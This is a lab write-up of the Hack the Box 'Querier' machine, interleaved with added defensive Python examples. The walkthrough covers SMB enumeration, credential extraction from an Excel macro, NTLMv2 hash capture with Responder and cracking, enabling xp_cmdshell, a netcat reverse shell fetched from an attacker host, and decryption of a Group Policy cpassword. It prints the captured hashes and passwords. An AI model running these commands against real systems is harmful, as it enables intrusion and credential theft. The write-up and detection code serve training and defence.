• Donald Ashdown

Hack the Box Querier

Updated: Apr 20

Summary




This was an amazing machine that involved an insecure file sharing service that provided credentials for an SQL Server connection and a basic shell. From here we pursued the classic xp_cmdshell. However, permissions were denied on xp_cmdshell, and we had to use Responder and dir/file tree to bypass the permissions by creating a rogue SMB server and forcing the MSSQL server to authenticate to it, capturing the hash. From here we landed a reverse shell using command injection for an initial foothold and enumerated with winPEAS and PowerUp. This flagged the GPO history, where we found a Group Policy XML template with a password hash that we cracked for administrator.

Processes/Techniques

Anonymous file login

File forensics

Excel macro extraction

SQL dir/file tree permission bypass

SQL xp_cmdshell

GPO history enumeration

Reverse shell


Tools used

Impacket-mssql

Impacket-psexec

Binwalk

Winpeas

Powerup

Hashcat

Gpp Decrypt

Nishang

Impacket-SMB Server

Python simple server

Wget

Responder

Hash identifier



References

https://stackoverflow.com/questions/26750054/xp-dirtree-in-sql-server


https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/


https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wendels-small-hacking-tricks-microsoft-sql-server-edition


https://www.kali.org/tools/gpp-decrypt/


https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15


Enumeration

We start off with a simple enumeration to get a quick snapshot of what we are working with. We initially see ports for a file share and SQL service. There is no web port so we can assume we must dive deep into SQL, file share or both.


Taking our enumeration a little further, we scan the target machine using the nmap default scripts with -sC and the nmap service enumeration scripts with -sV.

We gather the host and domain FQDN names and SQL version.


File share enumeration

Let's jump into file share enumeration using smbclient, which can connect to SMB file shares from a Linux host.

smbclient -L 10.129.1.147 

We are initially presented with several hidden shares that are unlikely to reveal anything or to have the permissions we require. The final share, "Reports", however, is not a default share name and therefore does not have default and native permissions.


Connecting to the share with the classic anonymous login, we see the 'Currency Volume Reports.xlsm' file.


We immediately attempt to download this file with the classic mget and get commands, neither of which works. Upon further investigation we list all available commands and clearly see that mget is listed. Taking a closer look, the error message from mget stated it could not find the file 'Currency', which suggests it is not capturing the whole file name due to white space.

So we append single quotes around the file name without success. When appending double quotes however we achieve a file download.


File Forensics

Because the file Report.xlsm stuck out like a sore thumb, I jumped into forensics right away to understand what its purpose in the lab was. Running the file command shows us it is an Excel 2007 file. Although we could actually open this in Excel, I am instead going to check it for hidden files because my intuition is telling me to.


Running binwalk immediately revealed hidden content in the file.


Here we find the extracted file and we notice a macro titled 'vbaProject.bin' which we want to investigate right away.


Running cat on the file, we see a large amount of content. Parsing through it all, we find some valuable information within:


DB = volume

Uid = reporting

Pwd = PcwTWTHRwryjc$c6

Server=Querier
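
The same find from the defender's side, as an added example that is not part of the original post: a scan of a macro-enabled Office file for connection-string credentials left in vbaProject.bin. The sample workbook, server name and password are constructed; VBA source is stored compressed, so a raw byte scan like this only sees strings that survive as literals, as they did here.

```python
import io
import re
import zipfile

# ODBC/OLE DB connection-string keys that identify the target or carry a secret.
CONN_KEY = re.compile(
    rb"(?i)\b(server|database|uid|user id|pwd|password)\s*=\s*([^;\"\r\n\x00]{1,64})"
)


def scan_macro_document(data: bytes) -> dict:
    """Return connection-string fields found in any vbaProject.bin part."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith("vbaproject.bin"):
                continue
            for key, value in CONN_KEY.findall(zf.read(name)):
                found[key.decode().lower()] = value.decode("latin-1").strip()
    return found


def has_embedded_password(data: bytes) -> bool:
    fields = scan_macro_document(data)
    return "pwd" in fields or "password" in fields


def build_sample_xlsm() -> bytes:
    """Constructed test document: a ZIP with a fake vbaProject.bin part."""
    vba = (b"\x01\x00garbage\x00conn.ConnectionString = \"Driver={SQL Server};"
           b"Server=EXAMPLE-SQL;Trusted_Connection=no;Database=volume;"
           b"Uid=reporting;Pwd=Constructed-Example-1\"\x00more\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", vba)
    return buf.getvalue()


if __name__ == "__main__":
    fields = scan_macro_document(build_sample_xlsm())
    # Report which secrets exist without echoing them into logs.
    for key in sorted(fields):
        shown = "<redacted>" if key in ("pwd", "password") else fields[key]
        print(f"{key} = {shown}")
```
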



SQL Connection

From here we are able to pivot into the impacket suite where we can utilize mssqlclient to make that initial connection with our newly found credentials.


python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc$c6@10.129.1.147

This however kept erroring out because the shell treats the unescaped $c6 as a variable and expands it, so I finally escaped the $ character and it worked.

python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.129.1.147


xp_cmdshell

xp_cmdshell literally spawns a Windows command shell and accepts a string to execute as its argument. This is normally restricted or locked down on a system but is a common CTF target.

Below is a little guide on xp_cmdshell. Unfortunately it is not that easy, as we can see that we do not have the needed permissions to pass commands to xp_cmdshell.


https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15




Researching this permissions error led me to the resource below, which provides instructions on enabling xp_cmdshell.


Reference:

https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/


The steps are shown below:

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;



Man in the middle

Researching and diving into the forums, it became clear that although permissions are often deployed to protect these systems, there are in fact many ways to circumvent such initial and basic permissions. Trustwave released an amazing article on this, linked below. I tried many of the techniques, and the one that finally worked was the MITM method: leveraging Responder to capture the hash when the SQL Server authenticates to a spoofed SMB server, triggered through the SQL function dirtree.


Reference: cmd_shell bypass techniques

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wendels-small-hacking-tricks-microsoft-sql-server-edition


Reference: Actual use of the command

https://stackoverflow.com/questions/26750054/xp-dirtree-in-sql-server


So I spun up a responder server

[SMB] NTLMv2-SSP Client : 10.129.1.147

[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc

[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:0e22bb333ed6c738:DE7F38F1DDF8DD5FBA04A659336A3822:010100000000000000EF18ABDBBFD7010EC138EF9A8EAE980000000002000800380037005A00540001001E00570049004E002D004F0059004F0055005600420053004E0035003400430004003400570049004E002D004F0059004F0055005600420053004E003500340043002E00380037005A0054002E004C004F00430041004C0003001400380037005A0054002E004C004F00430041004C0005001400380037005A0054002E004C004F00430041004C000700080000EF18ABDBBFD701060004000200000008003000300000000000000000000000003000005E57E89B872A66568CA654F48A9F822F9F6C264FA7A76FC823989A4D664D37FD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0035003800000000000000000000000000

[*] Skipping previously captured hash for QUERIER\mssql-svc
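
A defender's view of the technique above, as an added example that is not from the original post: listing a UNC path makes the SQL Server service account authenticate over SMB, so the database engine opening port 445 to a host outside its approved file servers is the signal to alert on. The event records, account names, addresses and approved network are constructed assumptions; the field names follow Sysmon Event ID 3.

```python
import ipaddress

# Assumption: the only networks this SQL Server legitimately reaches over SMB
# (for example a backup share). Everything else is unexpected.
APPROVED_SMB_NETS = [ipaddress.ip_network("192.0.2.0/28")]
SMB_PORTS = {139, 445}
SQL_ENGINE = "sqlservr.exe"
SQL_PATH = r"C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"

# Constructed Sysmon Event ID 3 (network connection) records, reduced to the
# fields this check reads. Addresses are documentation ranges.
EVENTS = [
    {"Image": SQL_PATH, "User": r"EXAMPLE\mssql-svc", "Initiated": "true",
     "DestinationIp": "192.0.2.10", "DestinationPort": "445"},
    {"Image": SQL_PATH, "User": r"EXAMPLE\mssql-svc", "Initiated": "true",
     "DestinationIp": "198.51.100.7", "DestinationPort": "445"},
    {"Image": SQL_PATH, "User": r"EXAMPLE\mssql-svc", "Initiated": "false",
     "DestinationIp": "192.0.2.20", "DestinationPort": "1433"},
    {"Image": r"C:\Windows\explorer.exe", "User": r"EXAMPLE\alice", "Initiated": "true",
     "DestinationIp": "198.51.100.7", "DestinationPort": "445"},
]


def is_unexpected_smb(event: dict) -> bool:
    """True when the database engine itself opens SMB to an unapproved host."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if image != SQL_ENGINE or event["Initiated"].lower() != "true":
        return False
    if int(event["DestinationPort"]) not in SMB_PORTS:
        return False
    dest = ipaddress.ip_address(event["DestinationIp"])
    return not any(dest in net for net in APPROVED_SMB_NETS)


def unexpected_smb(events: list) -> list:
    return [e for e in events if is_unexpected_smb(e)]


if __name__ == "__main__":
    for e in unexpected_smb(EVENTS):
        print(f"ALERT {e['User']} via {SQL_ENGINE} -> "
              f"{e['DestinationIp']}:{e['DestinationPort']}")
```

Blocking outbound 139/445 from the database server at the host or network firewall removes the capture path entirely.
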


Can't crack the hash

I was not able to crack the hash by copying and pasting it into a file. This is because the hash is actually several blocks in length, so we have to use the output file natively prepared by Responder, found in ./usr/share/responder/logs/SMB-NTLMV2-SSP-10.129.1.147.exe


└─$ hashcat -m 5600 SMB-NTLMv2-SSP-10.129.1.147.txt ../../../../usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...


OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

=============================================================================================================================

* Device #1: pthread-Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz, 1423/1487 MB (512 MB allocatable), 2MCU


Minimum password length supported by kernel: 0

Maximum password length supported by kernel: 256


Hashes: 3 digests; 2 unique digests, 2 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Rules: 1


Applicable optimizers applied:

* Zero-Byte

* Not-Iterated


ATTENTION! Pure (unoptimized) backend kernels selected.

Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.

If you want to switch to optimized backend kernels, append -O to your commandline.

See the above message to find out about the exact limits.


Watchdog: Hardware monitoring interface not found on your system.

Watchdog: Temperature abort trigger disabled.


Host memory required for this attack: 64 MB


Dictionary cache building ../../../../usr/share/wordlists/rockyou.txt: 33553434 bytDictionary cache built:

* Filename..: ../../../../usr/share/wordlists/rockyou.txt

* Passwords.: 14344392

* Bytes.....: 139921507

* Keyspace..: 14344385

* Runtime...: 0 secs


MSSQL-SVC::QUERIER:0e22bb333ed6c738:de7f38f1ddf8dd5fba04a659336a3822:010100000000000000ef18abdbbfd7010ec138ef9a8eae980000000002000800380037005a00540001001e00570049004e002d004f0059004f0055005600420053004e0035003400430004003400570049004e002d004f0059004f0055005600420053004e003500340043002e00380037005a0054002e004c004f00430041004c0003001400380037005a0054002e004c004f00430041004c0005001400380037005a0054002e004c004f00430041004c000700080000ef18abdbbfd701060004000200000008003000300000000000000000000000003000005e57e89b872a66568ca654f48a9f822f9f6c264fa7a76fc823989a4d664d37fd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0035003800000000000000000000000000:corporate568

MSSQL-SVC::QUERIER:6bb09e5dda6a6844:5d8db413486b66f641195d5199db73bd:010100000000000000ef18abdbbfd701cfd5055faf915ecb0000000002000800380037005a00540001001e00570049004e002d004f0059004f0055005600420053004e0035003400430004003400570049004e002d004f0059004f0055005600420053004e003500340043002e00380037005a0054002e004c004f00430041004c0003001400380037005a0054002e004c004f00430041004c0005001400380037005a0054002e004c004f00430041004c000700080000ef18abdbbfd701060004000200000008003000300000000000000000000000003000005e57e89b872a66568ca654f48a9f822f9f6c264fa7a76fc823989a4d664d37fd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0035003800000000000000000000000000:corporate568

Session..........: hashcat

Status...........: Cracked

Hash.Name........: NetNTLMv2

Hash.Target......: SMB-NTLMv2-SSP-10.129.1.147.txt

Time.Started.....: Wed Oct 13 03:36:29 2021 (13 secs)

Time.Estimated...: Wed Oct 13 03:36:42 2021 (0 secs)

Guess.Base.......: File (../../../../usr/share/wordlists/rockyou.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.#1.........: 1313.0 kH/s (1.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8

Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts

Progress.........: 17920000/28688770 (62.46%)

Rejected.........: 0/17920000 (0.00%)

Restore.Point....: 8957952/14344385 (62.45%)

Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1

Candidates.#1....: correita.54 -> cornbread3


Started: Wed Oct 13 03:36:06 2021

Stopped: Wed Oct 13 03:36:44 2021


Privileged SQL login

Using the username and password I attempted to log in, but this did not work. I received an error that the login was from an untrusted domain. I thought about this for a minute and clued in that I would likely need to add the host to our /etc/hosts file in order to be recognized and therefore trusted as a safe host mapping.


mssql-svc

corporate568


After adding querier.htb to our /etc/hosts file, I proceeded to connect to the host by using the forward lookup name @querier.htb.




From here I proceeded to test the xp_cmdshell command and was denied access. However, I know that this user probably has higher permissions given it is the SQL service account. So, going back and referencing the Trustwave article, I am able to enable xp_cmdshell and execute commands.

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

Reverse shell

File transfer of netcat with powershell wget



xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe


From here I proceeded to execute nc64.exe and pass arguments for a reverse shell.


xp_cmdshell nc64.exe -e cmd 10.10.14.27 6363

This however was not working, so I decided to download the file to a defined location and call it from that location.


xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe -o C:\Users\mssql-svc\Downloads\nc64.exe

xp_cmdshell C:\Users\mssql-svc\Downloads\nc64.exe -e cmd 10.10.14.27 6363


Root

From here I uploaded winpeas.exe as usual; however, it did not work, so I backtracked to the .bat version. First I transferred the file with


xp_cmdshell powershell wget http://10.10.14.27:8000/winPEAS.bat -o C:\Users\mssql-svc\Downloads\winPEAS.bat

I was able to run the script with


winPEAS.bat





But wait! Juicy Potato does not work on Server 2019 and newer, and we are running Server 2019.




Upon seeing the password, I immediately elevate my shell to powershell by simply typing powershell. From here I retrieved the file and proceeded to pass the hash found within the .xml.


C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml    

C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml                                        




C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups> type Groups.xml                               
type Groups.xml     
                                                                                                                                                                                    
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">                                                                                                          
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">                                                                                                                                                                                              
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>                                                                                                                           
PS C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups>       


CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ


Researching Group Policy passwords led me to a broader understanding and a decryption tool.

https://www.kali.org/tools/gpp-decrypt/




MyUnclesAreMarioAndLuigi !! 1!
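
An audit for the finding above, added here and not part of the original post: walk a policy tree (SYSVOL or a host's Group Policy History cache) and report every preference element that still carries a cpassword attribute, without decrypting it. The sample tree mirrors the Groups.xml shown above with a placeholder value, and the list of file names checked is an assumption about where such attributes appear.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Assumption: preference files in which a cpassword attribute can appear.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

def find_cpasswords(root_dir: str) -> list:
    """Report every <Properties> element with a non-empty cpassword."""
    findings = []
    for folder, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(folder, fname)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # unreadable XML: skip it, keep auditing
            for parent in tree.iter():
                for props in parent.findall("Properties"):
                    if props.get("cpassword"):
                        findings.append({
                            "file": path,
                            "account": props.get("userName") or parent.get("name"),
                            "changed": parent.get("changed"),
                        })
    return findings

def build_sample_tree(base: str) -> str:
    """Constructed copy of the layout shown above, with a placeholder value."""
    groups = os.path.join(base, "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                          "Machine", "Preferences", "Groups")
    os.makedirs(groups)
    with open(os.path.join(groups, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write('<?xml version="1.0" encoding="UTF-8" ?><Groups>'
                 '<User name="Administrator" changed="2019-01-28 23:12:48">'
                 '<Properties action="U" cpassword="PLACEHOLDER" userName="Administrator"/>'
                 '</User></Groups>')
    return base

def audit_sample() -> list:
    with tempfile.TemporaryDirectory() as tmp:
        return find_cpasswords(build_sample_tree(tmp))

if __name__ == "__main__":
    for hit in audit_sample():
        print(hit["account"], hit["changed"], os.path.basename(hit["file"]))
```

The MS14-025 update stopped new passwords being saved in preferences but did not delete existing files, so any hit means removing the preference and rotating that account's password.
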


